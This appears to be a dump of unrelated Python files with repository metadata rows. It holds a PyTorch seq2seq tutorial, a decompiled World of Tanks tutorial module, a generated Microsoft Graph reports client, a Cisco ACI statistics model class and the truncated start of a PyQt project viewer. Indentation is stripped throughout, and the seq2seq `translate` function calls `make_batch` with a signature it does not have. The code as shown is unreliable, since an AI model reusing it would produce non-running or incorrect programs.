# P: Symbol that will fill in blank sequence if current batch data size is short than time steps
def make_batch():
input_batch, output_batch, target_batch = [], [], []
for seq in seq_data:
for i in range(2):
seq[i] = seq[i] + 'P' * (n_step - len(seq[i]))
input = [num_dic[n] for n in seq[0]]
output = [num_dic[n] for n in ('S' + seq[1])]
target = [num_dic[n] for n in (seq[1] + 'E')]
input_batch.append(np.eye(n_class)[input])
output_batch.append(np.eye(n_class)[output])
target_batch.append(target) # not one-hot
# make tensor
return torch.FloatTensor(input_batch), torch.FloatTensor(output_batch), torch.LongTensor(target_batch)
# Model
class Seq2Seq(nn.Module):
def __init__(self):
super(Seq2Seq, self).__init__()
self.enc_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
self.dec_cell = nn.RNN(input_size=n_class, hidden_size=n_hidden, dropout=0.5)
self.fc = nn.Linear(n_hidden, n_class)
def forward(self, enc_input, enc_hidden, dec_input):
enc_input = enc_input.transpose(0, 1) # enc_input: [max_len(=n_step, time step), batch_size, n_class]
dec_input = dec_input.transpose(0, 1) # dec_input: [max_len(=n_step, time step), batch_size, n_class]
# enc_states : [num_layers(=1) * num_directions(=1), batch_size, n_hidden]
_, enc_states = self.enc_cell(enc_input, enc_hidden)
# outputs : [max_len+1(=6), batch_size, num_directions(=1) * n_hidden(=128)]
outputs, _ = self.dec_cell(dec_input, enc_states)
model = self.fc(outputs) # model : [max_len+1(=6), batch_size, n_class]
return model
if __name__ == '__main__':
n_step = 5
n_hidden = 128
char_arr = [c for c in 'SEPabcdefghijklmnopqrstuvwxyz']
num_dic = {n: i for i, n in enumerate(char_arr)}
seq_data = [['man', 'women'], ['black', 'white'], ['king', 'queen'], ['girl', 'boy'], ['up', 'down'], ['high', 'low']]
n_class = len(num_dic)
batch_size = len(seq_data)
model = Seq2Seq()
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
input_batch, output_batch, target_batch = make_batch()
for epoch in range(5000):
# make hidden shape [num_layers * num_directions, batch_size, n_hidden]
hidden = torch.zeros(1, batch_size, n_hidden)
optimizer.zero_grad()
# input_batch : [batch_size, max_len(=n_step, time step), n_class]
# output_batch : [batch_size, max_len+1(=n_step, time step) (becase of 'S' or 'E'), n_class]
# target_batch : [batch_size, max_len+1(=n_step, time step)], not one-hot
output = model(input_batch, hidden, output_batch)
# output : [max_len+1, batch_size, n_class]
output = output.transpose(0, 1) # [batch_size, max_len+1(=6), n_class]
loss = 0
for i in range(0, len(target_batch)):
# output[i] : [max_len+1, n_class, target_batch[i] : max_len+1]
loss += criterion(output[i], target_batch[i])
if (epoch + 1) % 1000 == 0:
print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.6f}'.format(loss))
loss.backward()
optimizer.step()
# Test
def translate(word, args):
input_batch, output_batch, _ = make_batch([[word, 'P' * len(word)]], args)
# make hidden shape [num_layers * num_directions, batch_size, n_hidden]
hidden = torch.zeros(1, 1, args.n_hidden)
output = model(input_batch, hidden, output_batch)
# output : [max_len+1(=6), batch_size(=1), n_class]
predict = output.data.max(2, keepdim=True)[1] # select n_class dimension
decoded = [char_arr[i] for i in predict]
end = decoded.index('E')
translated = ''.join(decoded[:end])
return translated.replace('P', '')
print('test')
print('man ->', translate('man'))
print('mans ->', translate('mans'))
print('king ->', translate('king'))
print('black ->', translate('black'))
print('upp ->', translate('upp')) | [
"nlkey2022@gmail.com"
] | nlkey2022@gmail.com |
c21487e95047e7209880aab4b11f9873f8316f2f | 518d911a66485947c5d336e96a842f162ef9caf1 | /res/scripts/client/tutorial/control/battle/context.py | 60e1e8e996bdcfac10af60694026e7022c73417e | [] | no_license | wotmods/WOTDecompiled | 84b8e5d32ee73e1356b4d57318eb76dfac6b5220 | 45fd599666c55cb871f6b84b0ec977b9d4baf469 | refs/heads/master | 2020-12-25T21:34:26.096544 | 2014-11-05T13:58:39 | 2014-11-05T13:58:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,653 | py | # 2014.10.18 14:44:36 Central European Daylight Time
#Embedded file name: scripts/client/tutorial/control/battle/context.py
import BigWorld, FMOD
from collections import namedtuple
import struct
from constants import ARENA_GUI_TYPE
from tutorial.control import context
from tutorial.control.context import ClientCtx, GlobalStorage
from tutorial.logger import LOG_DEBUG, LOG_ERROR, LOG_WARNING
import SoundGroups
BATTLE_RECORDS = ['completed',
'failed',
'accCompleted',
'startedAt',
'chapterIdx']
EXTENDED_BATTLE_RECORDS = ['playerTeam',
'winnerTeam',
'finishReason',
'vTypeCD',
'arenaTypeID',
'arenaUniqueID']
ALL_BATTLE_RECORDS = BATTLE_RECORDS + EXTENDED_BATTLE_RECORDS
BATTLE_RECORDS_FORMAT = '3ifh'
ALL_BATTLE_RECORDS_FORMAT = '3if4h2iQ'
class TRAINING_RESULT_KEY:
FINISHED = 'finished'
FAILED = 'failed'
class TRAINING_FINISH_REASON_KEY:
FINISHED = 'finished'
FAILED = 'failed'
TIMEOUT = 'timeout'
EXTERMINATION = 'extermination'
class BattleClientCtx(ClientCtx, namedtuple('BattleClientCtx', BATTLE_RECORDS)):
@classmethod
def _makeDefault(cls):
return cls.__new__(cls, 0, -1, -1, 0.0, -1)
@classmethod
def makeCtx(cls, record):
result = cls._makeDefault()
if record is not None and len(record):
try:
result = cls._make(struct.unpack(BATTLE_RECORDS_FORMAT, record))
except struct.error:
LOG_ERROR('Client ctx is not valid', record)
return result
@classmethod
def fetch(cls, *args):
player = BigWorld.player()
if player is None or not hasattr(player, 'clientCtx'):
LOG_DEBUG('Avatar.clientCtx not found', player)
result = cls._makeDefault()
else:
result = cls.makeCtx(player.clientCtx)
return result
def _store(self):
record = self.makeRecord()
player = BigWorld.player()
if player is None or not hasattr(player, 'storeClientCtx'):
LOG_DEBUG('Avatar.storeClientCtx not found', player)
return False
player.storeClientCtx(record)
return True
def makeRecord(self):
return struct.pack(BATTLE_RECORDS_FORMAT, *self)
def addMask(self, mask, done = True):
completed = self.completed
failed = self.failed
if done:
completed |= mask
else:
failed |= mask
newCtx = self._replace(completed=completed, failed=failed)
if newCtx._store():
return newCtx
return self
def setChapterIdx(self, chapterIdx):
newCtx = self._replace(chapterIdx=chapterIdx)
if newCtx._store():
return newCtx
return self
def setAccCompleted(self, accCompleted):
newCtx = self._replace(accCompleted=accCompleted)
if newCtx._store():
return newCtx
return self
def setStartedAt(self, time):
newCtx = self._replace(startedAt=time)
if newCtx._store():
return newCtx
return self
class ExtendedBattleClientCtx(ClientCtx, namedtuple('ExtendedBattleClientCtx', ALL_BATTLE_RECORDS)):
@classmethod
def _makeDefault(cls):
return cls.__new__(cls, 0, -1, -1, 0.0, -1, 1, 2, -1, -1, -1, -1)
@classmethod
def makeCtx(cls, record):
result = cls._makeDefault()
if record is not None and len(record):
try:
result = cls._make(struct.unpack(ALL_BATTLE_RECORDS_FORMAT, record))
except struct.error:
LOG_ERROR('Client ctx is not valid', record)
return result
@classmethod
def fetch(cls, *args):
params = ExtendedBattleClientCtx._makeDefault()._asdict()
player = BigWorld.player()
params.update(BattleClientCtx.fetch()._asdict())
arena = getattr(player, 'arena', None)
if arena is not None:
info = arena.periodAdditionalInfo
if info is not None and len(info) > 1:
params['winnerTeam'] = info[0]
params['finishReason'] = info[1]
params['arenaUniqueID'] = arena.arenaUniqueID
arenaType = arena.arenaType
if arenaType is not None:
params['arenaTypeID'] = arenaType.id
pVehID = getattr(player, 'playerVehicleID', None)
vehicles = arena.vehicles
if pVehID in vehicles:
vDescriptor = vehicles[pVehID]['vehicleType']
if vDescriptor is not None:
params['vTypeCD'] = vDescriptor.type.compactDescr
params['playerTeam'] = getattr(player, 'team', 1)
LOG_DEBUG('All records in context', params)
return ExtendedBattleClientCtx(**params)
def makeRecord(self):
return struct.pack(ALL_BATTLE_RECORDS_FORMAT, *self)
class BattleStartReqs(context.StartReqs):
def isEnabled(self):
arena = getattr(BigWorld.player(), 'arena', None)
enabled = False
if arena is not None:
enabled = arena.guiType == ARENA_GUI_TYPE.TUTORIAL
return enabled
def process(self):
loader, ctx = self._flush()
clientCtx = BattleClientCtx.fetch()
ctx.bonusCompleted = clientCtx.completed
GlobalStorage.clearVars()
loader._doRun(ctx)
class BattleBonusesRequester(context.BonusesRequester):
def request(self, chapterID = None):
chapter = self.getChapter(chapterID=chapterID)
if chapter is None:
LOG_ERROR('Chapter not found', chapterID)
return
if not chapter.hasBonus():
LOG_ERROR('Chapter has not bonus', chapter.getID())
return
bonusID = chapter.getBonusID()
mask = 1 << bonusID
localCtx = BattleClientCtx.fetch().addMask(mask)
if chapter.isBonusReceived(self._completed):
LOG_DEBUG('Bonus already received', chapter.getID(), self._completed)
self._isReceived = True
return
LOG_DEBUG('Received bonus', bonusID)
self._completed |= mask
self._gui.setTrainingProgress(self._tutorial._descriptor.getProgress(localCtx.completed))
class BattleSoundPlayer(context.SoundPlayer):
__guiSounds = {context.SOUND_EVENT.TASK_FAILED: '/GUI/notifications_FX/task_new',
context.SOUND_EVENT.TASK_COMPLETED: '/GUI/notifications_FX/task_complete',
context.SOUND_EVENT.NEXT_CHAPTER: '/GUI/notifications_FX/task_part_complete'}
def __init__(self):
super(BattleSoundPlayer, self).__init__()
self.__ignoreNext = False
self.__speakSnd = None
self.__nextSpeakID = None
self.__prevSpeaks = set()
def play(self, event, sndID = None):
if self.isMuted():
return
if event in self.__guiSounds.keys():
self._playGUI(event)
elif event is context.SOUND_EVENT.SPEAKING:
self._speak(sndID)
else:
LOG_WARNING('Sound event is not supported', event)
def stop(self):
self._clear()
self.__ignoreNext = False
self.__nextSpeakID = None
self.__prevSpeaks.clear()
def isPlaying(self, event, sndID = None):
result = False
if event is context.SOUND_EVENT.SPEAKING:
if self.__speakSnd is not None:
if sndID is not None:
result = len(self.__prevSpeaks) and list(self.__prevSpeaks)[-1] == sndID
else:
result = True
else:
LOG_WARNING('Sound event is not supported', event)
return result
def goToNextChapter(self):
self.__prevSpeaks.clear()
def _playGUI(self, event):
if self.__ignoreNext:
self.__ignoreNext = False
return
if event is context.SOUND_EVENT.NEXT_CHAPTER:
self.__ignoreNext = True
sndID = self.__guiSounds[event]
sound = SoundGroups.g_instance.FMODgetSound(sndID)
if sound:
sound.play()
else:
LOG_ERROR('Sound not found', sndID)
def _clear(self):
if self.__speakSnd is not None:
self.__speakSnd.setCallback('EVENTFINISHED', None)
self.__speakSnd.stop()
self.__speakSnd = None
def _speak(self, sndID):
if sndID in self.__prevSpeaks:
LOG_DEBUG('Speaking played, ignore', sndID)
return
if sndID is None:
LOG_WARNING('Sound ID for speaking is not defined')
return
if self.__speakSnd is not None:
self.__nextSndID = sndID
return
sound = SoundGroups.g_instance.FMODgetSound(sndID)
if not sound:
LOG_ERROR('Sound not found', sndID)
return
self.__nextSndID = None
self.__speakSnd = sound
self.__prevSpeaks.add(sndID)
sound.setCallback('EVENTFINISHED', self.__onSpeakingStop)
sound.play()
def __onSpeakingStop(self, sound):
LOG_DEBUG('Stop playing sound by event', sound)
self._clear()
if self.__nextSndID is not None:
self._speak(self.__nextSndID)
+++ okay decompyling res/scripts/client/tutorial/control/battle/context.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:44:36 Central European Daylight Time
| [
"chodakk@RWAMWCOE31488.emea.roche.com"
] | chodakk@RWAMWCOE31488.emea.roche.com |
d82aacb1766a56a6ec366a413244151cecbedd3f | 6364bb727b623f06f6998941299c49e7fcb1d437 | /msgraph-cli-extensions/src/reports/azext_reports/vendored_sdks/reports/aio/_reports_async.py | 1d9d705411e28f9c5eacf93474eb657f3973b795 | [
"MIT"
] | permissive | kanakanaidu/msgraph-cli | 1d6cd640f4e10f4bdf476d44d12a7c48987b1a97 | b3b87f40148fb691a4c331f523ca91f8a5cc9224 | refs/heads/main | 2022-12-25T08:08:26.716914 | 2020-09-23T14:29:13 | 2020-09-23T14:29:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,260 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import ReportsConfiguration
from .operations_async import ReportReportRootOperations
from .operations_async import ReportOperations
from .. import models
class Reports(object):
"""Reports.
:ivar report_report_root: ReportReportRootOperations operations
:vartype report_report_root: reports.aio.operations_async.ReportReportRootOperations
:ivar report: ReportOperations operations
:vartype report: reports.aio.operations_async.ReportOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param top: Show only the first n items.
:type top: int
:param skip: Skip the first n items.
:type skip: int
:param search: Search items by search phrases.
:type search: str
:param filter: Filter items by property values.
:type filter: str
:param count: Include count of items.
:type count: bool
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
top: Optional[int] = None,
skip: Optional[int] = None,
search: Optional[str] = None,
filter: Optional[str] = None,
count: Optional[bool] = None,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://graph.microsoft.com/beta'
self._config = ReportsConfiguration(credential, top, skip, search, filter, count, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.report_report_root = ReportReportRootOperations(
self._client, self._config, self._serialize, self._deserialize)
self.report = ReportOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "Reports":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| [
"japhethobalak@gmail.com"
] | japhethobalak@gmail.com |
8bc2526d1210aaeeddc5332487c6db2726415489 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/proc/memhist5min.py | 0b28165a7e907ca15861ca5e0d33a7e10d87c977 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 10,846 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class MemHist5min(Mo):
"""
A class that represents historical statistics for memory in a 5 minute sampling interval. This class updates every 10 seconds.
"""
meta = StatsClassMeta("cobra.model.proc.MemHist5min", "memory")
counter = CounterMeta("current", CounterCategory.GAUGE, "bytes", "memory allocated")
counter._propRefs[PropCategory.IMPLICIT_MIN] = "currentMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "currentMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "currentAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "currentSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "currentThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "currentTr"
meta._counters.append(counter)
meta.moClassName = "procMemHist5min"
meta.rnFormat = "HDprocMem5min-%(index)s"
meta.category = MoCategory.STATS_HISTORY
meta.label = "historical memory stats in 5 minute"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.parentClasses.add("cobra.model.proc.Entity")
meta.parentClasses.add("cobra.model.proc.Entry")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Hist")
meta.superClasses.add("cobra.model.proc.MemHist")
meta.rnPrefixes = [
('HDprocMem5min-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "currentAvg", "currentAvg", 10497, PropCategory.IMPLICIT_AVG)
prop.label = "memory allocated average value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentAvg", prop)
prop = PropMeta("str", "currentMax", "currentMax", 10496, PropCategory.IMPLICIT_MAX)
prop.label = "memory allocated maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMax", prop)
prop = PropMeta("str", "currentMin", "currentMin", 10495, PropCategory.IMPLICIT_MIN)
prop.label = "memory allocated minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("currentMin", prop)
prop = PropMeta("str", "currentSpct", "currentSpct", 10498, PropCategory.IMPLICIT_SUSPECT)
prop.label = "memory allocated suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("currentSpct", prop)
prop = PropMeta("str", "currentThr", "currentThr", 10499, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "memory allocated thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("currentThr", prop)
prop = PropMeta("str", "currentTr", "currentTr", 10500, PropCategory.IMPLICIT_TREND)
prop.label = "memory allocated trend"
prop.isOper = True
prop.isStats = True
meta.props.add("currentTr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "index", "index", 7037, PropCategory.REGULAR)
prop.label = "History Index"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("index", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "index"))
def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
namingVals = [index]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
f45a309ca55db005180c288b1341b2cd7fc07019 | 7b556e8c35668a336e381ca30c61110408abf69e | /HSTB/kluster/gui/kluster_projectview.py | 47e50d3ab1e6f3fd279ded5446d78fac100deb56 | [
"CC0-1.0"
] | permissive | OceanXplorer/kluster | 54775c3c4a93d9d51609248005271b1d7d7529c1 | bffddca5de7fd1a0eb8d5bf6b87252b84adc0636 | refs/heads/master | 2023-03-15T14:22:51.569255 | 2021-03-18T21:27:11 | 2021-03-18T21:27:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,560 | py | from datetime import datetime, timezone
from HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal
from collections import OrderedDict
import os
from HSTB.kluster.fqpr_generation import Fqpr
from HSTB.kluster.fqpr_project import FqprProject
from HSTB.kluster.gui.common_widgets import CollapsibleWidget
from HSTB.shared import RegistryHelpers
class MultibeamTable(QtWidgets.QWidget):
"""
Contains the QTableWidget that displays all the information related to the multibeam files in the project
"""
def __init__(self, multibeam_dict: dict, *args, **kwargs):
super().__init__(*args, **kwargs)
self.vlayout = QtWidgets.QVBoxLayout()
self.table = QtWidgets.QTableWidget()
self.vlayout.addWidget(self.table)
self.setLayout(self.vlayout)
self.table.setSortingEnabled(True)
self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.table.setColumnCount(3)
self.table.setColumnWidth(0, 350)
self.table.setColumnWidth(1, 200)
self.table.setColumnWidth(2, 200)
self.table.setHorizontalHeaderLabels(['Multibeam File Name', 'Multibeam Start Time', 'Multibeam End Time'])
self.table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
self.multibeam_dict = multibeam_dict
self.populate()
self.setMinimumHeight(600)
self.vlayout.layout()
def populate(self):
for mbesfile, times in self.multibeam_dict.items():
next_row = self.table.rowCount()
self.table.insertRow(next_row)
self.table.setItem(next_row, 0, QtWidgets.QTableWidgetItem(mbesfile))
self.table.setItem(next_row, 1, QtWidgets.QTableWidgetItem(datetime.fromtimestamp(times[0], tz=timezone.utc).strftime('%c')))
self.table.setItem(next_row, 2, QtWidgets.QTableWidgetItem(datetime.fromtimestamp(times[1], tz=timezone.utc).strftime('%c')))
class StatusTable(QtWidgets.QWidget):
"""
Contains the QTableWidget that has all the information about the processed status of each sounding in the project
"""
def __init__(self, status_dict: dict, *args, **kwargs):
super().__init__(*args, **kwargs)
self.vlayout = QtWidgets.QVBoxLayout()
self.table = QtWidgets.QTableWidget()
self.vlayout.addWidget(self.table)
self.setLayout(self.vlayout)
self.table.setSortingEnabled(True)
self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.status_dict = status_dict
self.headr = ['SerialNumber_SectorNumber_Frequency'] + list(self.status_dict[list(self.status_dict.keys())[0]].keys())
self.table.setColumnCount(len(self.headr))
self.table.setColumnWidth(0, 250)
for i in range(len(self.headr) - 1):
self.table.setColumnWidth(i + 1, 100)
self.table.setHorizontalHeaderLabels(self.headr)
# self.table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
self.populate()
self.setMinimumHeight(300)
self.vlayout.layout()
def populate(self):
for sector, counts in self.status_dict.items():
status_values = list(counts.values())
next_row = self.table.rowCount()
self.table.insertRow(next_row)
self.table.setItem(next_row, 0, QtWidgets.QTableWidgetItem(sector))
for cnt, val in enumerate(status_values):
self.table.setItem(next_row, cnt + 1, QtWidgets.QTableWidgetItem(str(val)))
class LastRunTable(QtWidgets.QWidget):
def __init__(self, lastrun_dict: dict, *args, **kwargs):
super().__init__(*args, **kwargs)
self.vlayout = QtWidgets.QVBoxLayout()
self.table = QtWidgets.QTableWidget()
self.vlayout.addWidget(self.table)
self.setLayout(self.vlayout)
self.table.setSortingEnabled(True)
self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.lastrun_dict = lastrun_dict
self.headr = ['SerialNumber_SectorNumber_Frequency'] + [x[1:] + '_utc' for x in list(self.lastrun_dict[list(self.lastrun_dict.keys())[0]].keys())]
self.table.setColumnCount(len(self.headr))
self.table.setColumnWidth(0, 250)
self.table.setColumnWidth(1, 160)
self.table.setColumnWidth(2, 200)
self.table.setColumnWidth(3, 215)
self.table.setColumnWidth(4, 215)
self.table.setColumnWidth(5, 230)
self.table.setColumnWidth(6, 200)
self.table.setHorizontalHeaderLabels(self.headr)
# self.table.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
self.populate()
self.setMinimumHeight(300)
self.vlayout.layout()
def populate(self):
for sector, counts in self.lastrun_dict.items():
lastrun_values = list(counts.values())
next_row = self.table.rowCount()
self.table.insertRow(next_row)
self.table.setItem(next_row, 0, QtWidgets.QTableWidgetItem(sector))
for cnt, val in enumerate(lastrun_values):
self.table.setItem(next_row, cnt + 1, QtWidgets.QTableWidgetItem(val))
class KlusterFqprView(QtWidgets.QWidget):
def __init__(self, parent, fqpr_inst: Fqpr, *args, **kwargs):
super().__init__(*args, **kwargs)
self.parent = parent
# fqpr = fully qualified ping record, the term for the datastore in kluster
self.fqpr_inst = fqpr_inst
self.dashboard_data = fqpr_inst.return_processing_dashboard()
self.vlayout = QtWidgets.QVBoxLayout()
self.tree = QtWidgets.QTreeWidget()
self.tree.setHeaderHidden(True)
